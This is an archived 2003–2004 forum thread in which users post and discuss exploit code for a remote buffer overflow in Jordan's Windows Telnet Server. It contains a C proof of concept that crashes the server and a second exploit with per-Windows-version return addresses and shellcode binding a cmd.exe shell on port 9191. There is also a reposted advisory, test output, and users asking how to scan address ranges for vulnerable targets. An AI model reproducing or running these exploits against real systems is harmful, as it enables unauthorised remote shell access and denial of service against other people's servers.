Jordan's Windows Telnet Server

Full Version: Jordan's Windows Telnet Server

GovernmentSecurity.org > The Archives > Public Downloads

ehm

Dec 31 2003, 10:23 AM

CODE

/*

by Luigi Auriemma

Use -DWIN to compile the source on Windows

UNIX & WIN VERSION
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif

#define VER "0.1"
#define PORT 23
#define BUFFSZ 2048
#define BOFSZ 518 /* 516 + 0d + 0a */
#define OFFSET 512
#define RETADD 0xdeadc0de

u_long resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
u_char *buff;
struct sockaddr_in peer;
int sd,
err;
u_short port = PORT;

setbuf(stdout, NULL);

fputs("\n"
"Jordan's Windows Telnet Server 1.2 remote buffer-overflow "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);

if(argc < 2) {
printf("\nUsage: %s <server> [port(%d)]\n"
"\n"
"The return address will be overwritten with the value 0x%08x\n"
"\n", argv[0], PORT, RETADD);
exit(1);
}

#ifdef WIN
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

if(argc > 2) port = atoi(argv[2]);

peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;

buff = malloc(BUFFSZ);
if(!buff) std_err();

sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();

printf("\n"
"Connecting to %s:%hu...",
inet_ntoa(peer.sin_addr), port);
err = connect(sd, (struct sockaddr *)&peer, sizeof(peer));
if(err < 0) std_err();
fputs("ok and now sending the big string\n\n", stdout);

err = recv(sd, buff, BUFFSZ, 0);
if(err < 0) std_err();
fwrite(buff, err, 1, stdout);

/* BOOM BOOM CICABOOM */
memset(buff, 'A', BOFSZ - 2); // fill buffer
*(long *)(buff + OFFSET) = RETADD; // write RETADD
memcpy(buff + BOFSZ - 2, "\x0d\x0a", 2); // CRLF

err = send(sd, buff, BOFSZ, 0);
if(err < 0) std_err();

err = recv(sd, buff, BUFFSZ, 0);
if(err < 0) std_err();
fwrite(buff, err, 1, stdout);
fputc('\n', stdout);

close(sd);

return(0);
}

u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolve hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)(hp->h_addr);
}

return(host_ip);
}

#ifndef WIN
void std_err(void) {
perror("\nError");
exit(1);
}
#endif

CODE

/*
Header file used for manage errors in Windows
It support socket and errno too
(this header replace the previous sock_errX.h)
*/

#include <string.h>
#include <errno.h>

void std_err(void) {
char *error;

switch(WSAGetLastError()) {
case 10004: error = "Interrupted system call"; break;
case 10009: error = "Bad file number"; break;
case 10013: error = "Permission denied"; break;
case 10014: error = "Bad address"; break;
case 10022: error = "Invalid argument (not bind)"; break;
case 10024: error = "Too many open files"; break;
case 10035: error = "Operation would block"; break;
case 10036: error = "Operation now in progress"; break;
case 10037: error = "Operation already in progress"; break;
case 10038: error = "Socket operation on non-socket"; break;
case 10039: error = "Destination address required"; break;
case 10040: error = "Message too long"; break;
case 10041: error = "Protocol wrong type for socket"; break;
case 10042: error = "Bad protocol option"; break;
case 10043: error = "Protocol not supported"; break;
case 10044: error = "Socket type not supported"; break;
case 10045: error = "Operation not supported on socket"; break;
case 10046: error = "Protocol family not supported"; break;
case 10047: error = "Address family not supported by protocol family"; break;
case 10048: error = "Address already in use"; break;
case 10049: error = "Can't assign requested address"; break;
case 10050: error = "Network is down"; break;
case 10051: error = "Network is unreachable"; break;
case 10052: error = "Net dropped connection or reset"; break;
case 10053: error = "Software caused connection abort"; break;
case 10054: error = "Connection reset by peer"; break;
case 10055: error = "No buffer space available"; break;
case 10056: error = "Socket is already connected"; break;
case 10057: error = "Socket is not connected"; break;
case 10058: error = "Can't send after socket shutdown"; break;
case 10059: error = "Too many references, can't splice"; break;
case 10060: error = "Connection timed out"; break;
case 10061: error = "Connection refused"; break;
case 10062: error = "Too many levels of symbolic links"; break;
case 10063: error = "File name too long"; break;
case 10064: error = "Host is down"; break;
case 10065: error = "No Route to Host"; break;
case 10066: error = "Directory not empty"; break;
case 10067: error = "Too many processes"; break;
case 10068: error = "Too many users"; break;
case 10069: error = "Disc Quota Exceeded"; break;
case 10070: error = "Stale NFS file handle"; break;
case 10091: error = "Network SubSystem is unavailable"; break;
case 10092: error = "WINSOCK DLL Version out of range"; break;
case 10093: error = "Successful WSASTARTUP not yet performed"; break;
case 10071: error = "Too many levels of remote in path"; break;
case 11001: error = "Host not found"; break;
case 11002: error = "Non-Authoritative Host not found"; break;
case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
case 11004: error = "Valid name, no data record of requested type"; break;
default: error = strerror(errno); break;
}
fprintf(stderr, "\nError: %s\n", error);
exit(1);
}

DJVASTVASTY2K

Dec 31 2003, 10:46 AM

Hello M8's

Thank You For This Sploit

Ive not seen many TelNet Sploits so this does make a change. I wounder how many Vulnerable servers I have that are vulnerable to this exploit.

Thank You

Best Regards

Adam

Vast Gsm

DJVASTVASTY2K

Dec 31 2003, 10:49 AM

Hello M8's

Just To Show Some People Of How It Looks When Exploit Is Launched.

C:\>cd C:\WINDOWS\IWam_User_Config\Security\31-12-03

C:\WINDOWS\IWam_User_Config\Security\31-12-03>jordwts

Jordan's Windows Telnet Server 1.2 remote buffer-overflow 0.1
by Luigi Auriemma
e-mail: aluigi@altervista.org
web: http://aluigi.altervista.org

Usage: jordwts <server> [port(23)]

The return address will be overwritten with the value 0xdeadc0de

C:\WINDOWS\IWam_User_Config\Security\31-12-03>

Best Regards

Adam

Vast Gsm

liquidSilver

Dec 31 2003, 10:54 AM

DJVASTVASTY2K: Post whore. Man, what did you just explain that we not already know?!

...god.

DJVASTVASTY2K

Dec 31 2003, 10:56 AM

Hello m8's

I would Like To Say A Big Thank You To "Luigi Auriemma" For Releaseing This Exploit And Advisory.

Please Say A Big Thank You To "Ehm" For Posting This Exploit Along With The Source And It Being Compiled Too.

All I Have Done Is Filled In Some Additional Details Etc..

PS>
===
Some people may be woundering when this exploit was released to public well here it is.

PPS>
===
Some People May Also Be Woundering About More Info On This Exploit So Here It Is Enjoy!

Best Regards

Adam

Vast Gsm

News:

29 Dec 2003 Advisories: Buffer-overflow in Jordan's telnet server.

#######################################################################

Luigi Auriemma

Application: Jordan's Windows Telnet server
http://www.jordan.com/WindowsTelnetServer
Versions: 1.0 (but the same version is also identified as 1.2)
Platform: Windows
Bug: buffer overflow
Risk: high
Exploitation: remote
Date: 29 Dec 2003
Author: Luigi Auriemma
e-mail: aluigi@altervista.org
web: http://aluigi.altervista.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Windows Telnet Server (Wtsd) is a small commercial telnet server
written by Jordan Stojanovski.

#######################################################################

======
2) Bug
======

The bug is a remote buffer-overflow in the client's login procedure.
Practically an username of 518 bytes fully overwrites the return
address of the vulnerable function.
The problem happens in the unchecked copy of the buffer containing the
string received from the socket to the new smaller buffer:

:00406281 F3A5 rep movsd

(instruction's offset of the demo version)

#######################################################################

===========
3) The Code
===========

http://aluigi.altervista.org/poc/jordwts.zip

#######################################################################

======
4) Fix
======

No replies from the author.

#######################################################################

bl00dyviper

Dec 31 2003, 11:46 AM

is there any possibilty to identify which telnet server is running because i get soo many results on port 23 ?

DJVASTVASTY2K

Dec 31 2003, 11:50 AM

QUOTE (bl00dyviper @ Dec 31 2003, 11:46 AM)

is there any possibilty to identify which telnet server is running because i get soo many results on port 23 ?

Hello M8's

HEHE

This Is Vuln To Normal TelNet

The Client Must Be Runnging Jordans "TelNet" server

I have Just Uploaded The TelNet Server Programme That The Target Needs To be Running

http://www.governmentsecurity.org/forum/in...?showtopic=5650

Hope This Helps

Best Regards

Adam

Vast Gsm

DJVASTVASTY2K

Dec 31 2003, 11:53 AM

Hello M8's

@Bl00dyViper

A ThankYou To "Ehm"

Dont Go A Miss.

Best Regards

Adam

Vast Gsm

DJVASTVASTY2K

Dec 31 2003, 11:54 AM

QUOTE (LiquidSilver @ Dec 31 2003, 10:54 AM)

DJVASTVASTY2K: Post whore. Man, what did you just explain that we not already know?!

...god.

Hello M8's

No Offence

But Yes SOME PEOPLE DO NOT Allready Know

It Prooves It Below

LOL

Best Regards

Adam

Vast Gsm

bl00dyviper

Dec 31 2003, 11:59 AM

yeah but i can't test thousands of servers if there is "jordan telnet server" running because there is not only one telnet server version so is there any tool like http where i can identify the banner of the telnet server ?

seppel18

Dec 31 2003, 12:11 PM

Does it Spawn a Shell, or is it just DoS-Sploit??

TheAngel

Dec 31 2003, 12:11 PM

i think we shuld use a CGI scanner for this
like xray
but whats the cgi command to scanning this?

Divx_dude

Dec 31 2003, 07:56 PM

thx dude i tested it local and it worked verry good only that the TELNET server crashes;)

Divx_dude

Dec 31 2003, 08:03 PM

CODE

Connecting to 192.168.0.13:23...ok and now sending the big string

Windows Telnet Server Version 1.0
Copyright(C) Jordan Stojanovski 1999
------------------------------------
User name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAÌ└¡Ì

C:\Documents and Settings\admin\Desktop\telnet exploit>

i think its a DOS exploit

seppel18

Dec 31 2003, 10:07 PM

yeah..no shellcode

cyrixx

Jan 1 2004, 06:36 AM

eeeeeem, what about that?

CODE

/*
* Jordan's Windows Telnet server v.1.0 remote exploit
* binds cmd.exe shell on port 9191
*
* Home page: http://www.jordan.com/WindowsTelnetServer
* Advisory: http://security.nnov.ru/search/document.asp?docid=5583
*
* Tested on winxp only, but must work on other win32 systems.
*
* -d4rkgr3y [d4rk@securitylab.ru], m00.void.ru
*
*/

#include <string.h>
#include <unistd.h>
#include <netdb.h>

struct
{
char *platform;
long ret;
}

targets[]=
{
{"Windows XP sp0", 0x77F5801C}, // ntdll.dll : jmp esp
{"Windows XP sp1", 0x77fb59cc},
{"Windows 2000 SP1" , 0x77e3cb4c } ,
{"Windows 2000 SP2" , 0x77e2492b } ,
{"Windows 2000 SP3" , 0x77e2afc5 } ,
{"Windows 2000 SP4" , 0x77e14c29 } ,
{"Windows NT sp6", 0x77f0eac3},
{"Windows 98 SE", 0x7fdabfa9},
{"Denial-of-Service attack", 0xdefaced},
};

char payload[] =
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90";

char w32pbshellcode[] =
"xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33"
"xC9x66xB9xC9x01x80x30x88x40xE2xFAxDDx03x64x03x7C"
"x09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFE"
"x74xE0x06xC6x86x64x60xD9x89x88x88x01xCEx4ExE0xBB"
"xBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77"
"xFEx74xE0x25x51x8Dx46x60xB8x89x88x88x01xCEx5Ax77"
"xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77"
"xFEx74xE0x67x46x68xE8x60x98x89x88x88x01xCEx42x77"
"xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77"
"xFEx70xE0x51x81x7Dx25x60x78x88x88x88x01xCEx78x77"
"xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77"
"xFEx70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77"
"xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6Ax77"
"xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBB"
"x77x09x64x7Cx89x88x88xDCxE0x89x89x88x88x77xDEx7C"
"xD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0"
"x8Ax88xABx6Fx03x44xE2x9ExD9xDBx77xDEx64xDFxDBx77"
"xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0"
"xEBxE5xECx88x01xEEx4Ax0Bx4Cx24x05xB4xACxBBx48xBB"
"x41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5"
"x01xDCxACxC0x01xDCxACxC4x01xDCxACxD8x05xCCxACx98"
"xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDE"
"x46x03x44xE2x77x77xB9x77xDEx5Ax03x40x77xFEx36x77"
"xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8"
"x84x03xF8x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDF"
"x03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90"
"x03xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74"
"xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3xF4"
"xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94"
"x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5DxD7xD6xD5"
"xD3x4Ax8Cx88";

void usage();

struct hostent *hp;

int main(int argc, char *argv[])
{
unsigned short port=23;
unsigned int sock,addr,hand;
char buf[1032], shit[666];

printf("n Jordan's Windows Telnet server v.1.0 remote exploitn");
printf("ttby m00 Security // m00.void.runn");

if(argc<3 || argc>4) usage(argv[0]);
if((atoi(argv[2]))>5) usage(argv[0]);
if(argv[3]) port = atoi(argv[3]);

memset(buf,'x41',1032);
memcpy(&buf[512], (unsigned char *) &targets[atoi(argv[2])].ret, 4);
memcpy(&buf[516], payload, sizeof(payload));
memcpy(&buf[548], w32pbshellcode, sizeof(w32pbshellcode));
memset(buf+strlen(w32pbshellcode)+548,'x0d',1);
memset(buf+strlen(w32pbshellcode)+548+1,'x0a',1);

printf("~ Resolving hostname => ");
if((hp=gethostbyname(argv[1]))==NULL) {
printf("failedn");
exit(1);
}
printf("donen");

printf("~ Conneting => ");
if((sock=connect_to_host(port))==-1) {
printf("failedn");
exit(1);
}
printf("donen");

printf("~ Sending exploit buffer => ");
sleep(2);
recv(sock,shit,666,0);
send(sock,buf,1032,0);
printf("donen");
printf("~ Connecting to bindshell => ");
usleep(1000);
if((hand=connect_to_host(9191))==-1)
printf("failednn");
else {
printf("donen~ Shell spawned on port 9191 ^ have a nice daynn");
get_shell(hand);
}

close(sock);
exit(0);
}

void usage(char *progname)
{
int i;
printf("Usage: %s <host> <os type> [port]nnWhere 'os type' is:n",progname);
for(i=0;targets.platform;i++) {
printf(" %i %sn", i, targets.platform);
}
printf("n");
exit(0);
}

int connect_to_host(int port)
{
int sockt;
struct sockaddr_in saddr;

if((sockt=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
return -1;
memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
saddr.sin_family=AF_INET;
saddr.sin_addr.s_addr=*((unsigned long *)hp->h_addr_list[0]);
saddr.sin_port=htons(port);
if(connect(sockt, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
close(sockt);
return -1;
} else
return sockt;
}

int get_shell(int bsh)
{
fd_set rfds;
int retVal,r;
char buf[0x31337];
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(bsh, &rfds);
retVal=select(bsh+1, &rfds, NULL, NULL, NULL);
if(retVal) {
if(FD_ISSET(bsh, &rfds)) {

buf[(r=recv(bsh, buf, 8095,0))]='';
printf("%s", buf);
}
if(FD_ISSET(0, &rfds)) {
buf[(r=read(0, buf, 8095))]='';
send(bsh, buf, strlen(buf), 0);
}
}
} while(retVal && r);

close(bsh);
return 1;
}

BlueSkydrei

Jan 1 2004, 06:04 PM

Had anybody luck compile this?

rush

Jan 4 2004, 12:06 PM

Hehe i scanned like 50 ranges from 1.1.0.0 - 1.1.255.255 (example)
And none of them was running Jordans server, ( I did it with superscanner4 portbanner grabbing)
Then i installed it localy and it seems a dos exploit none cmd shell

KoNh

Jan 4 2004, 12:12 PM

Aslo have this exploit compiled (there are 2 versions) both
are crashing the telnet daemon (tryed it on my network)
no shell binded to any port...

SyN/AcK

Jan 20 2004, 01:16 AM

If anyone is still interested, I found one that works for me. Search on google for ws_bo.c. It binds a shell to port 9191.

Mephisto

Jan 20 2004, 03:10 PM

can you post it here SyN/AcK so we can test your program plz??

and thnx allot 4 the sploit

SyN/AcK

Jan 20 2004, 06:28 PM

Yep, I'll do it in an hour or two... I have to find it, my computer is all unorganized now.

-=[MePhIsTo]=-

Jan 22 2004, 02:58 PM

But how to scan for this Server. When i do a Banner scan with DSNS on Port 23 it only give me decrypt letters like

CODE

207.21.*.* 23 ........#..'..$

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.